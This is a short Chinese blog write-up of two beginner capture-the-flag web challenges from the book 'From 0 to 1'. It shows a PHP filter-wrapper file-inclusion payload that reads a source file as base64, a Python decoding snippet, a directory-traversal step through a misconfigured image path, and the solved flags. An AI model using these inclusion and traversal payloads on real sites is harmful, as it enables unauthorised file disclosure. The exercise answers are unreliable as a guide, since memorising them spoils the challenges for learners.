刷书《从0到1》第一章之文件上传
时间:2021-03-30 16:46:37
收藏:0
阅读:16
[第一章web入门] afr_1
- 源码没有提示
- Burp suite抓包没有线索
0X1观察URL
http://a414a458-b376-4ffd-8101-b8925a4fc133.node3.buuoj.cn/?p=hel
根据书上的内容,首先出现是Filter协议.这个师傅讲得好
0X2使用Filter伪协议来构造playload查看文件内容
http://a414a458-b376-4ffd-8101-b8925a4fc133.node3.buuoj.cn/?p=php://filter/read=convert.base64-encode/resource=flag
PD9waHAKZGllKCdubyBubyBubycpOwovL24xYm9va3thZnJfMV9zb2x2ZWR9
0X3进行base64转码
<?php die(‘no no no‘); //n1book{afr_1_solved}
-
最近学python,尝试用python写脚本来解base64码
1 import requests 2 import time 3 import base64 4 re1=base64.b64decode(‘PD9waHAKZGllKCdubyBubyBubycpOwovL24xYm9va3thZnJfMV9zb2x2ZWR9‘.encode(‘utf-8‘)) 5 print(str(re1,‘utf-8‘))
[第一章web入门] afr_2
0X1 F12观察源码
0X2 添加子目录img
0X3 根据提示进入子目录img../
0X4 记事本打开电脑下载的flag文件
n1book{afr_2_solved}
原文:https://www.cnblogs.com/forchan/p/14596497.html
评论(0)